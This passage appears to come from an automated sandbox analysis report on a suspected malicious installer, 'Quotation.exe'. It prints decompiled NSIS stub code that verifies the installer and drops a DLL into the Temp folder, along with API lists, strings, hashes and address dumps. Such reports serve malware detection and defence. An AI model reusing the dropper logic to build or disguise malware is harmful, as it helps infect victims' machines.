							 *0x42f4c0 =  *_t102 & 0x00000018;
							 *0x42f430 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x42f434 =  *0x42f434 + 1;
								__eflags =  *0x42f434;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
								__eflags = _t93;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E0040568C(0x42f440, _t102 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E0040311B( *0x414c50);
					_t73 = E004030E9( &_v12, 4); // executed
					__eflags = _t73;
					if(_t73 == 0) {
						goto L33;
					}
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						goto L33;
					}
					goto L31;
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x42f42c) & 0x00007e00) + 0x200;
						__eflags = _t101 - _t78;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030E9(0x420c58, _t92); // executed
						__eflags = _t79;
						if(_t79 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x42f42c;
						if( *0x42f42c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t84 = GetTickCount();
									__eflags = _t84 - _t97;
									if(_t84 > _t97) {
										_v8 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405D18(0);
								}
							}
							goto L22;
						}
						E0040568C( &_v48, 0x420c58, 0x1c);
						_t94 = _v48;
						__eflags = _t94 & 0xfffffff0;
						if((_t94 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_t89 = _v24;
						__eflags = _t89 - _t101;
						if(_t89 > _t101) {
							goto L33;
						}
						_a4 = _a4 | _t94;
						_t95 =  *0x414c50; // 0x37aff
						__eflags = _a4 & 0x00000008;
						 *0x42f42c = _t95;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t24 = _t89 - 4; // 0x1c
							_t101 = _t24;
							__eflags = _t92 - _t101;
							if(_t92 > _t101) {
								_t92 = _t101;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t101 -  *0x428c58; // 0x37b03
						if(__eflags < 0) {
							_v16 = E00405D4B(_v16, 0x420c58, _t92);
						}
						 *0x414c50 =  *0x414c50 + _t92;
						_t101 = _t101 - _t92;
						__eflags = _t101;
					} while (_t101 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































                                                0x00402c42
                                                0x00402c45
                                                0x00402c4b
                                                0x00402c4e
                                                0x00402c51
                                                0x00402c64
                                                0x00402c6a
                                                0x00402c7d
                                                0x00402c82
                                                0x00402c85
                                                0x00402c8b
                                                0x00000000
                                                0x00402c8d
                                                0x00402c98
                                                0x00402ca0
                                                0x00402ca6
                                                0x00402ca8
                                                0x00402cad
                                                0x00402caf
                                                0x00402dde
                                                0x00402de0
                                                0x00402de6
                                                0x00000000
                                                0x00000000
                                                0x00402de8
                                                0x00402deb
                                                0x00402e0f
                                                0x00402e1a
                                                0x00402e25
                                                0x00402e2a
                                                0x00402e2d
                                                0x00402e2e
                                                0x00402e2f
                                                0x00402e31
                                                0x00402e36
                                                0x00402e39
                                                0x00402e5a
                                                0x00402e5e
                                                0x00402e64
                                                0x00402e66
                                                0x00402e66
                                                0x00402e66
                                                0x00402e6e
                                                0x00402e72
                                                0x00402e79
                                                0x00402e7e
                                                0x00402e80
                                                0x00402e80
                                                0x00402e80
                                                0x00402e88
                                                0x00402e88
                                                0x00402e8b
                                                0x00402e8c
                                                0x00402e8c
                                                0x00402e8f
                                                0x00402e91
                                                0x00402e91
                                                0x00402e91
                                                0x00402e9b
                                                0x00402ea1
                                                0x00402eaf
                                                0x00402eb4
                                                0x00000000
                                                0x00402eb4
                                                0x00402e3c
                                                0x00000000
                                                0x00402e3c
                                                0x00402df3
                                                0x00402dfe
                                                0x00402e03
                                                0x00402e05
                                                0x00000000
                                                0x00000000
                                                0x00402e0a
                                                0x00402e0d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402cb5
                                                0x00402cb5
                                                0x00402cba
                                                0x00402cbe
                                                0x00402cc5
                                                0x00402cca
                                                0x00402ccc
                                                0x00402cce
                                                0x00402cce
                                                0x00402cd6
                                                0x00402cdb
                                                0x00402cdd
                                                0x00402e49
                                                0x00402e4d
                                                0x00402e52
                                                0x00402e52
                                                0x00402e42
                                                0x00000000
                                                0x00402e42
                                                0x00402ce5
                                                0x00402ceb
                                                0x00402d6c
                                                0x00402d70
                                                0x00402d72
                                                0x00402d75
                                                0x00402d7f
                                                0x00402d85
                                                0x00402d87
                                                0x00402da3
                                                0x00402da3
                                                0x00402d77
                                                0x00402d78
                                                0x00402d78
                                                0x00402d75
                                                0x00000000
                                                0x00402d70
                                                0x00402cf8
                                                0x00402cfd
                                                0x00402d00
                                                0x00402d06
                                                0x00000000
                                                0x00000000
                                                0x00402d0c
                                                0x00402d13
                                                0x00000000
                                                0x00000000
                                                0x00402d19
                                                0x00402d20
                                                0x00000000
                                                0x00000000
                                                0x00402d26
                                                0x00402d2d
                                                0x00000000
                                                0x00000000
                                                0x00402d2f
                                                0x00402d36
                                                0x00000000
                                                0x00000000
                                                0x00402d38
                                                0x00402d3b
                                                0x00402d3d
                                                0x00000000
                                                0x00000000
                                                0x00402d43
                                                0x00402d46
                                                0x00402d4c
                                                0x00402d50
                                                0x00402d56
                                                0x00402d5e
                                                0x00402d5e
                                                0x00402d61
                                                0x00402d61
                                                0x00402d64
                                                0x00402d66
                                                0x00402d68
                                                0x00402d68
                                                0x00000000
                                                0x00402d66
                                                0x00402d58
                                                0x00402d5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402da6
                                                0x00402da6
                                                0x00402dac
                                                0x00402dbc
                                                0x00402dbc
                                                0x00402dbf
                                                0x00402dc5
                                                0x00402dc7
                                                0x00402dc7
                                                0x00402dcf
                                                0x00402dd3
                                                0x00402dd8
                                                0x00402dd8
                                                0x00000000
                                                0x00402dd3

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402C45
                                                • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402C6A
                                                  • Part of subcall function 004056AC: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056B0
                                                  • Part of subcall function 004056AC: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056D2
                                                • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402CA0
                                                • DestroyWindow.USER32(00000000,00420C58,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402DD8
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402E14
                                                Strings
                                                • "C:\Users\user\Desktop\Quotation.exe" , xrefs: 00402C41
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                • soft, xrefs: 00402D26
                                                • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                • Inst, xrefs: 00402D19
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                • Null, xrefs: 00402D2F
                                                • verifying installer: %d%%, xrefs: 00402D89
                                                • Error launching installer, xrefs: 00402C8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                • String ID: "C:\Users\user\Desktop\Quotation.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                • API String ID: 2181728824-3044143185
                                                • Opcode ID: 853037081203bd668ba06eaad4f70a360d5dbacfb2310b69b9c297ac7c642539
                                                • Instruction ID: c463052a9c5fa83953bbfa6958f4efa241c8f41de6c5b3e58a45a606a63aebe6
                                                • Opcode Fuzzy Hash: 853037081203bd668ba06eaad4f70a360d5dbacfb2310b69b9c297ac7c642539
                                                • Instruction Fuzzy Hash: D561BE70A00214ABDB21AFA5DE49B9F7BB4BF14714F60813BE900B62D1D7B89D418B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402EBD, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 176fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t72;
				long _t75;
				intOrPtr _t80;
				long _t81;
				void* _t83;
				int _t85;
				void* _t98;
				void* _t101;
				long _t102;
				signed int _t103;
				long _t104;
				int _t105;
				intOrPtr _t106;
				long _t107;
				void* _t108;

				_t103 = _a16;
				_t98 = _a12;
				_v12 = _t103;
				if(_t98 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t98;
				if(_t98 == 0) {
					_v16 = 0x418c58;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E0040311B( *0x42f478 + _t66);
				}
				_t68 = E004030E9( &_a16, 4); // executed
				if(_t68 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t98 == 0) {
							while(_a16 > 0) {
								_t104 = _v12;
								if(_a16 < _t104) {
									_t104 = _a16;
								}
								if(E004030E9(0x414c58, _t104) == 0) {
									goto L34;
								} else {
									_t72 = WriteFile(_a8, 0x414c58, _t104,  &_a12, 0); // executed
									if(_t72 == 0 || _t104 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t69);
										return _t69;
									} else {
										_v8 = _v8 + _t104;
										_a16 = _a16 - _t104;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t103) {
							_t103 = _a16;
						}
						if(E004030E9(_t98, _t103) != 0) {
							_v8 = _t103;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t75 = GetTickCount();
					 *0x40b57c =  *0x40b57c & 0x00000000;
					 *0x40b578 =  *0x40b578 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b060 = 8;
					 *0x414c08 = 0x40cc00;
					 *0x414c04 = 0x40cc00;
					 *0x414c00 = 0x414c00;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t105 = 0x4000;
						if(_a16 < 0x4000) {
							_t105 = _a16;
						}
						if(E004030E9(0x414c58, _t105) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t105;
						 *0x40b050 = 0x414c58;
						 *0x40b054 = _t105;
						while(1) {
							_t101 = _v16;
							 *0x40b058 = _t101;
							 *0x40b05c = _v12;
							_t80 = E00405DB9("?TA");
							_v28 = _t80;
							if(_t80 < 0) {
								break;
							}
							_t106 =  *0x40b058; // 0x41a058
							_t107 = _t106 - _t101;
							_t81 = GetTickCount();
							_t102 = _t81;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t81 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t108 = _t108 + 0xc;
								E00404D7E(0,  &_v92);
								_v20 = _t102;
							}
							if(_t107 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t107;
									_v8 = _v8 + _t107;
									_t83 =  *0x40b058; // 0x41a058
									_v16 = _t83;
									if(_v12 < 1) {
										goto L45;
									}
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t85 = WriteFile(_a8, _v16, _t107,  &_v24, 0); // executed
								if(_t85 == 0 || _v24 != _t107) {
									goto L29;
								} else {
									_v8 = _v8 + _t107;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                                0x00402ec5
                                                0x00402ec9
                                                0x00402ecc
                                                0x00402ed1
                                                0x00402ed3
                                                0x00402ed3
                                                0x00402eda
                                                0x00402ede
                                                0x00402ee3
                                                0x00402ee5
                                                0x00402ee5
                                                0x00402eec
                                                0x00402ef1
                                                0x00402efc
                                                0x00402efc
                                                0x00402f07
                                                0x00402f0e
                                                0x00403094
                                                0x00403094
                                                0x00000000
                                                0x00402f14
                                                0x00402f18
                                                0x0040307f
                                                0x004030d4
                                                0x00403099
                                                0x0040309f
                                                0x004030a1
                                                0x004030a1
                                                0x004030b2
                                                0x00000000
                                                0x004030b4
                                                0x004030bf
                                                0x004030c7
                                                0x00403079
                                                0x00403079
                                                0x00403096
                                                0x00403096
                                                0x00000000
                                                0x004030ce
                                                0x004030ce
                                                0x004030d1
                                                0x00000000
                                                0x004030d1
                                                0x004030c7
                                                0x004030b2
                                                0x004030df
                                                0x00000000
                                                0x004030df
                                                0x00403084
                                                0x00403086
                                                0x00403086
                                                0x00403092
                                                0x004030dc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403092
                                                0x00402f24
                                                0x00402f26
                                                0x00402f2d
                                                0x00402f34
                                                0x00402f34
                                                0x00402f3b
                                                0x00402f43
                                                0x00402f4d
                                                0x00402f52
                                                0x00402f5a
                                                0x00402f64
                                                0x00402f67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f6d
                                                0x00402f6d
                                                0x00402f6d
                                                0x00402f75
                                                0x00402f77
                                                0x00402f77
                                                0x00402f88
                                                0x00000000
                                                0x00000000
                                                0x00402f8e
                                                0x00402f91
                                                0x00402f97
                                                0x00402f9d
                                                0x00402f9d
                                                0x00402fa8
                                                0x00402fae
                                                0x00402fb3
                                                0x00402fba
                                                0x00402fbd
                                                0x00000000
                                                0x00000000
                                                0x00402fc3
                                                0x00402fc9
                                                0x00402fcb
                                                0x00402fd4
                                                0x00402fd6
                                                0x00403004
                                                0x0040300a
                                                0x00403013
                                                0x00403018
                                                0x00403018
                                                0x0040301f
                                                0x0040306d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403021
                                                0x00403024
                                                0x00403046
                                                0x00403049
                                                0x0040304c
                                                0x00403055
                                                0x00403058
                                                0x00000000
                                                0x00000000
                                                0x0040305e
                                                0x00403062
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403068
                                                0x00403032
                                                0x0040303a
                                                0x00000000
                                                0x00403041
                                                0x00403041
                                                0x00000000
                                                0x00403041
                                                0x0040303a
                                                0x0040301f
                                                0x00403075
                                                0x00000000
                                                0x00403075
                                                0x00000000
                                                0x00402f6d

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402F24
                                                • GetTickCount.KERNEL32 ref: 00402FCB
                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FF4
                                                • wsprintfA.USER32 ref: 00403004
                                                • WriteFile.KERNELBASE(00000000,00000000,0041A058,7FFFFFFF,00000000), ref: 00403032
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CountTick$FileWritewsprintf
                                                • String ID: ... %d%%$?TA$XLA$XLA
                                                • API String ID: 4209647438-788936783
                                                • Opcode ID: 459603e19e3c928dff072d88ee64108c5bddede1666523ec3534e88c32769053
                                                • Instruction ID: 2a52969f5c244c71cf6e7afafcf32ff1ac156de72fa387f0f3f6be643268eac5
                                                • Opcode Fuzzy Hash: 459603e19e3c928dff072d88ee64108c5bddede1666523ec3534e88c32769053
                                                • Instruction Fuzzy Hash: 9761817190121ADBDF10DF65DA44AAF7BB8EB04356F10813BE910B72D4D7789E40CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405554(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054E8(E004059DB(0x409c40, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E004059DB();
				}
				E00405C17(0x409c40);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405CB0(0x409c40);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c40); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c40, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E004056AC(0x409c40, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D7E(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x42f4a8;
						goto L32;
					} else {
						E004059DB(0x40a440, 0x430000);
						E004059DB(0x430000, 0x409c40);
						E004059FD(_t77, 0x40a440, 0x409c40, "C:\Users\alfons\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059DB(0x430000, 0x40a440);
						_t62 = E004052DB("C:\Users\alfons\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4a8 =  *0x42f4a8 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404D7E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D7E(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_t43 = E00402EBD( *((intOrPtr*)(_t87 - 0x1c)),  *(_t87 - 8), _t77, _t77); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059FD(_t77, _t82, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E004059FD(_t77, _t82, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c40);
					E004052DB();
					goto L29;
				}
				goto L33;
			}


















                                                0x0040179d
                                                0x004017a4
                                                0x004017ad
                                                0x004017b0
                                                0x004017b3
                                                0x004017b8
                                                0x004017c0
                                                0x004017dc
                                                0x004017c2
                                                0x004017c2
                                                0x004017c3
                                                0x004017c3
                                                0x004017e2
                                                0x004017ec
                                                0x004017ec
                                                0x004017f0
                                                0x004017f3
                                                0x004017f8
                                                0x004017fa
                                                0x004017fc
                                                0x00401801
                                                0x00401801
                                                0x0040180c
                                                0x0040180c
                                                0x0040181d
                                                0x0040181f
                                                0x0040181f
                                                0x00401820
                                                0x00401820
                                                0x00401823
                                                0x00401826
                                                0x00401829
                                                0x0040182f
                                                0x0040182f
                                                0x00401833
                                                0x00401833
                                                0x0040183b
                                                0x0040184a
                                                0x0040184f
                                                0x00401852
                                                0x00401855
                                                0x00000000
                                                0x00000000
                                                0x00401857
                                                0x0040185a
                                                0x004018b4
                                                0x004018b9
                                                0x004015ca
                                                0x004026da
                                                0x004026da
                                                0x0040292f
                                                0x00402932
                                                0x00402932
                                                0x00000000
                                                0x0040185c
                                                0x00401862
                                                0x0040186d
                                                0x0040187a
                                                0x00401885
                                                0x0040189b
                                                0x0040189b
                                                0x0040189e
                                                0x00000000
                                                0x004018a4
                                                0x004018a4
                                                0x004018a5
                                                0x004018c2
                                                0x00402938
                                                0x00402938
                                                0x00402938
                                                0x004018a7
                                                0x004018a7
                                                0x004018a8
                                                0x00401495
                                                0x00402293
                                                0x00402293
                                                0x00402293
                                                0x004018a5
                                                0x0040189e
                                                0x0040293a
                                                0x0040293e
                                                0x0040293e
                                                0x004018d2
                                                0x004018d7
                                                0x004018e5
                                                0x004018ea
                                                0x004018f0
                                                0x004018f4
                                                0x004018f6
                                                0x004018fe
                                                0x0040190a
                                                0x004018f8
                                                0x004018f8
                                                0x004018fc
                                                0x00000000
                                                0x00000000
                                                0x004018fc
                                                0x00401913
                                                0x00401919
                                                0x0040191b
                                                0x00000000
                                                0x00401921
                                                0x00401921
                                                0x00401924
                                                0x0040193c
                                                0x00401926
                                                0x00401929
                                                0x00401932
                                                0x00401932
                                                0x00401941
                                                0x00401946
                                                0x0040228e
                                                0x00000000
                                                0x0040228e
                                                0x00000000

                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                • CompareFileTime.KERNEL32(-00000014,?,YVfgfgfgfgfg,YVfgfgfgfgfg,00000000,00000000,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                • GetFileAttributesA.KERNELBASE(YVfgfgfgfgfg,YVfgfgfgfgfg,00000000,00000000,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                • SetFileAttributesA.KERNELBASE(YVfgfgfgfgfg,00000000), ref: 00401833
                                                  • Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,ACID Setup,NSIS Error), ref: 004059E8
                                                  • Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                  • Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                  • Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,7519EA30), ref: 00404DDA
                                                  • Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E12
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E2C
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E3A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll$YVfgfgfgfgfg
                                                • API String ID: 1152937526-3562389757
                                                • Opcode ID: 15c6a27cd28eff93ecf0c019d82d4cc94b36f01a0f52ceaa2930de3d842a783a
                                                • Instruction ID: cdaedd3c6a5390e1bf503350d98347a993321a7ff473c6b68b0c18fdf3b675ae
                                                • Opcode Fuzzy Hash: 15c6a27cd28eff93ecf0c019d82d4cc94b36f01a0f52ceaa2930de3d842a783a
                                                • Instruction Fuzzy Hash: 69419172900519BBCB11BBA5CD46EAF36A9EF05329B20423BF511F11E1D67C4A41CAAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 023D11D7, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 347memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 023D14FF
